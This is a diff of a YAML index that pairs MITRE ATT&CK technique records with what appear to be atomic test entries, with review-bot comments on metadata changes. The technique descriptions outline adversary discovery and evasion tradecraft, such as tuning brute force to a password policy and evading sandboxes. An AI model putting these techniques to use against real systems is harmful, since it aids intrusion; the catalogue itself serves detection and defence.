- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
- type: attack-pattern
- created: '2020-02-21T21:08:36.570Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1087.004
- url: https://attack.mitre.org/techniques/T1087/004
- - description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
- url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
- source_name: Microsoft msolrolemember
- - description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
- 6, 2019.
- url: https://github.com/True-Demon/raindance
- source_name: GitHub Raindance
- - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
- url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
- source_name: Microsoft AZ CLI
- - description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
- Directory Leaks via Azure. Retrieved October 6, 2019.
- url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
- source_name: Black Hills Red Teaming MS AD Azure, 2018
- - source_name: AWS List Roles
- description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
- url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
- - source_name: AWS List Users
- url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
- description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
- - source_name: Google Cloud - IAM Servie Accounts List API
- url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
- description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
- August 4, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:51:18.808Z'
name: Cloud Account
description: "Adversaries may attempt to get a listing of cloud accounts. Cloud
accounts are those created and configured by an organization for use by users,
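Review bot: Almost everything this hunk removes reappears below with keys reordered (`type`, `id`, `created`, `created_by_ref`, the whole `external_references` list), so the substantive deltas are easy to miss: the platform list loses `Azure AD`, `Office 365` and `Google Workspace` (L365675, L365676, L365679) and `x_mitre_permissions_required` is not re-added. The misspelled reference key `Google Cloud - IAM Servie Accounts List API` (L365714) is carried over verbatim; leave it, since it is the key that `(Citation: ...)` markers in the description resolve against, and a fix has to land upstream on both sides at once. To keep future refreshes reviewable, emit keys in a fixed order, and verify this change by loading both revisions with a YAML parser and comparing the normalized objects rather than reading the textual diff.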
@@ -86052,19 +86701,61 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - SaaS
+ - IaaS
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
+ created: '2020-02-21T21:08:36.570Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1087/004
+ external_id: T1087.004
+ - source_name: AWS List Roles
+ description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
+ - source_name: AWS List Users
+ description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
+ - source_name: Black Hills Red Teaming MS AD Azure, 2018
+ description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
+ Directory Leaks via Azure. Retrieved October 6, 2019.
+ url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
+ - source_name: Google Cloud - IAM Servie Accounts List API
+ description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
+ August 4, 2020.
+ url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
+ - source_name: Microsoft AZ CLI
+ description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
+ - source_name: Microsoft msolrolemember
+ description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
+ - source_name: GitHub Raindance
+ description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
+ 6, 2019.
+ url: https://github.com/True-Demon/raindance
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1057:
technique:
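Review bot: `x_mitre_permissions_required: [User]` (L365746–L365747) is dropped without replacement and the platforms become `SaaS`, `IaaS`, `Office Suite`, `Identity Provider` (L365738–L365742). Anything that filters techniques by the old names `Azure AD`, `Office 365` or `Google Workspace`, including any per-platform index generated from this file, will silently lose T1087.004, so regenerate those artifacts in the same change and grep for remaining readers of `x_mitre_permissions_required`. The bump to `x_mitre_version: '1.3'` (L365743) is consistent with the platform change.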
@@ -86135,7 +86826,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1057
atomic_tests:
- name: Process Discovery - tasklist
@@ -86279,41 +86969,7 @@ discovery:
elevation_required: false
T1497.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
- type: attack-pattern
- created: '2020-03-06T21:04:12.454Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.002
- url: https://attack.mitre.org/techniques/T1497/002
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Sans Virtual Jan 2016
- url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
- description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
- Evasion Techniques. Retrieved April 17, 2019.
- - source_name: Unit 42 Sofacy Nov 2018
- url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
- description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
- Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
- LNK. Retrieved April 24, 2017.
- source_name: FireEye FIN7 April 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.050Z'
name: User Activity Based Checks
description: "Adversaries may employ various user activity checks to detect
and avoid virtualization and analysis environments. This may include changing
@@ -86337,6 +86993,9 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'User activity-based checks will likely occur in the first
steps of an operation but may also occur throughout as an adversary learns
the environment. Data and events should not be viewed in isolation, but as
@@ -86347,9 +87006,14 @@ discovery:
processes being spawned that gather a variety of system information or perform
other forms of Discovery, especially in a short period of time, may aid in
detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -86359,12 +87023,39 @@ discovery:
- Static File Analysis
- Signature-based detection
- Host forensic analysis
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+ created: '2020-03-06T21:04:12.454Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/002
+ external_id: T1497.002
+ - source_name: FireEye FIN7 April 2017
+ description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+ LNK. Retrieved April 24, 2017.
+ url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+ - source_name: Unit 42 Sofacy Nov 2018
+ description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+ Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+ url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+ - source_name: Sans Virtual Jan 2016
+ description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+ Evasion Techniques. Retrieved April 17, 2019.
+ url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1069.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:14:42.184Z'
name: 'Permission Groups Discovery: Local Groups'
description: |-
Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
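Review bot: `x_mitre_attack_spec_version` goes from `2.1.0` to `3.2.0` (L365872/L365900) while `x_mitre_version` stays at '1.1' (L365862) and no description text changes; that is fine for a schema-level bump. At the tail of the hunk, the T1069.001 `modified` stamp again moves backwards (L365905/L365906, 2023-05-09 to 2023-04-07); see the T1619 comment above for why the source of these timestamps should be documented.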
@@ -86407,7 +87098,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1069.001
atomic_tests:
- name: Basic Permission Groups Discovery Windows (Local)
@@ -86505,7 +87195,7 @@ discovery:
name: powershell
T1201:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:02:44.477Z'
name: Password Policy Discovery
description: |-
Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
@@ -86516,28 +87206,31 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Regina Elwell
+ - Sudhanshu Chauhan, @Sudhanshu_C
+ - Isif Ibrahima, Mandiant
+ - Austin Clark, @c2defense
+ x_mitre_deprecated: false
x_mitre_detection: Monitor logs and processes for tools and command line arguments
that may indicate they're being used for password policy discovery. Correlate
that activity with other suspicious activity from the originating system to
reduce potential false positives from valid user or administrator activity.
Adversaries will likely attempt to find the password policy early in an operation
and the activity is likely to happen with other Discovery activity.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- Linux
- macOS
- IaaS
- Network
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.5'
- x_mitre_contributors:
- - Regina Elwell
- - Sudhanshu Chauhan, @Sudhanshu_C
- - Isif Ibrahima, Mandiant
- - Austin Clark, @c2defense
+ - Identity Provider
+ - SaaS
+ - Office Suite
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Metadata'
- 'Command: Command Execution'
@@ -86570,9 +87263,8 @@ discovery:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1201
atomic_tests:
- name: Examine local password policy - Windows
@@ -86681,7 +87373,7 @@ discovery:
description: Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses
the Doppelgänging technique. Retrieved May 22, 2018.
url: https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:00:56.174Z'
name: 'System Location Discovery: System Language Discovery'
description: "Adversaries may attempt to gather information about the system
language of a victim in order to infer the geographical location of that host.
@@ -86720,8 +87412,6 @@ discovery:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1614.001
atomic_tests:
- name: Discover System Language by Registry Query
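Review bot: This hunk removes `x_mitre_attack_spec_version: 2.1.0` (L365994) with no replacement `+` line, whereas every other object in this diff ends up carrying `x_mitre_attack_spec_version: 3.2.0`; confirm the key is re-added elsewhere in the T1614.001 object, or this one technique will lack an attack spec version. Also, `x_mitre_permissions_required: [User]` is kept here (L365991–L365992) but dropped from T1087.004 and T1614 in their hunks; if the intent is the upstream removal of that field, this object is inconsistent.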
@@ -86793,7 +87483,7 @@ discovery:
command: PathToAtomicsFolder\..\ExternalPayloads\LanguageKeyboardLayout.exe
T1012:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-03T18:56:37.011Z'
name: Query Registry
description: |-
Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
@@ -86834,7 +87524,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1012
atomic_tests:
- name: Query Registry
@@ -86983,82 +87672,81 @@ discovery:
'
T1614:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- - IaaS
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:07:23.511Z'
+ name: System Location Discovery
+ description: |2-
+
+ Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+ Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW
can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
+
+ Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
x_mitre_contributors:
- Pooja Natarajan, NEC Corporation India
- Hiroki Nagahama, NEC Corporation
- Manikantan Srinivasan, NEC Corporation India
- Wes Hurd
- Katie Nickels, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW
to gather information.(Citation: FBI Ragnar Locker 2020)
+
+ Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ - IaaS
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Process: OS API Execution'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
created: '2021-04-01T16:42:08.735Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1614
url: https://attack.mitre.org/techniques/T1614
- - source_name: FBI Ragnar Locker 2020
- url: https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
- description: FBI. (2020, November 19). Indicators of Compromise Associated
- with Ragnar Locker Ransomware. Retrieved April 1, 2021.
- - source_name: Sophos Geolocation 2016
- url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
- description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
- target you based on where you live. Retrieved April 1, 2021.'
+ external_id: T1614
- source_name: Bleepingcomputer RAT malware 2020
- url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
description: Abrams, L. (2020, October 23). New RAT malware gets commands
via Discord, has ransomware feature. Retrieved April 1, 2021.
+ url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
- source_name: AWS Instance Identity Documents
- url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
description: Amazon. (n.d.). Instance identity documents. Retrieved April
2, 2021.
- - source_name: Microsoft Azure Instance Metadata 2021
- url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
- description: Microsoft. (2021, February 21). Azure Instance Metadata Service
- (Windows). Retrieved April 2, 2021.
+ url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
- source_name: Securelist Trasparent Tribe 2020
- url: https://securelist.com/transparent-tribe-part-1/98127/
description: 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis,
part 1. Retrieved April 1, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
- name: System Location Discovery
- description: |2-
-
- Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
- Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW
can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
-
- Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW
to gather information.(Citation: FBI Ragnar Locker 2020)
-
- Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
- x_mitre_version: '1.0'
+ url: https://securelist.com/transparent-tribe-part-1/98127/
+ - source_name: FBI Ragnar Locker 2020
+ description: FBI. (2020, November 19). Indicators of Compromise Associated
+ with Ragnar Locker Ransomware. Retrieved September 12, 2024.
+ url: https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
+ - source_name: Microsoft Azure Instance Metadata 2021
+ description: Microsoft. (2021, February 21). Azure Instance Metadata Service
+ (Windows). Retrieved April 2, 2021.
+ url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
+ - source_name: Sophos Geolocation 2016
+ description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
+ target you based on where you live. Retrieved April 1, 2021.'
+ url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Process: OS API Execution'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1614
atomic_tests:
- name: Get geolocation info through IP-Lookup services using curl Windows
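Review bot: Two content-level changes hide inside this reorder and should be called out in the commit message: `x_mitre_permissions_required` (L366147–L366148) is dropped, and the FBI Ragnar Locker reference moves from `assets.documentcloud.org` to `s3.documentcloud.org` with a new retrieved date (L366079 vs L366130). Pre-existing but visible here: the description is a literal block scalar (`|2-`), so the line break after `GetLocaleInfoW` (L366032–L366033, and again in the detection text at L366052–L366053) is preserved as a hard newline in the middle of a sentence; if the exporter can fold that line, do so, since the unchanged context line at L366033 shows git treating the sentence fragment as a standalone line.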
@@ -87146,7 +87834,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1518.001
atomic_tests:
- name: Security Software Discovery
@@ -87283,12 +87970,12 @@ discovery:
'
T1526:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Cloud Service Discovery
description: |-
- An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
+ An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
- Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
+ Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
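Review bot: the rewritten second paragraph of the T1526 description now names the Microsoft Graph API, but the reference it carries is still `(Citation: Azure AD Graph API)`, so the prose and its citation no longer agree. Either keep the wording the cited source actually documents, or add a Microsoft Graph citation next to the existing one so a reader following the reference lands on documentation for the API the sentence names. The `Azure AD` to `Entra ID` rename in the first paragraph has no citation attached and is fine as is.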
@@ -87296,10 +87983,12 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Suzy Schapperle - Microsoft Azure Red Team
- Praetorian
- Thanabodi Phrakhun, I-SECURE
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
@@ -87308,15 +87997,16 @@ discovery:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Enumeration'
+ - 'Logon Session: Logon Session Creation'
type: attack-pattern
id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
created: '2019-08-30T13:01:10.120Z'
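Review bot: the platform list on T1526 changes from `Azure AD`, `Office 365` and `Google Workspace` to `Office Suite` and `Identity Provider`; anything that filters or indexes on the old platform strings will silently stop matching this technique rather than fail. Confirm the per-platform index files are regenerated in the same change and call the rename out in the commit message. The added data source `Logon Session: Logon Session Creation` together with the `x_mitre_version` bump from 1.3 to 1.4 is consistent, since that is a content change and not just a rename.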
@@ -87344,9 +88034,6 @@ discovery:
url: https://github.com/RhinoSecurityLabs/pacu
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1526
atomic_tests: []
T1018:
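Review bot: `spec_version: '2.1'` is removed from T1526 here and from every technique object touched further down (T1018, T1046, T1518, T1538, T1622, T1124, T1583 and the rest), with nothing taking its place. If this YAML is ever consumed as STIX, that key is what identifies each object as a STIX 2.1 object; if the removal is intentional because the value is now carried by the bundle or implied by `x_mitre_attack_spec_version`, say so in the commit message, otherwise it reads as the generator having dropped a field.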
@@ -87421,7 +88108,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1018
atomic_tests:
- name: Remote System Discovery - net
@@ -87851,7 +88537,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1046
atomic_tests:
- name: Port Scan NMap for Windows
@@ -88076,7 +88761,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1518
atomic_tests:
- name: Find and Display Internet Explorer Browser Version
@@ -88141,7 +88825,7 @@ discovery:
name: powershell
T1538:
technique:
- modified: '2024-04-19T04:25:33.300Z'
+ modified: '2024-10-15T15:51:56.279Z'
name: Cloud Service Dashboard
description: |-
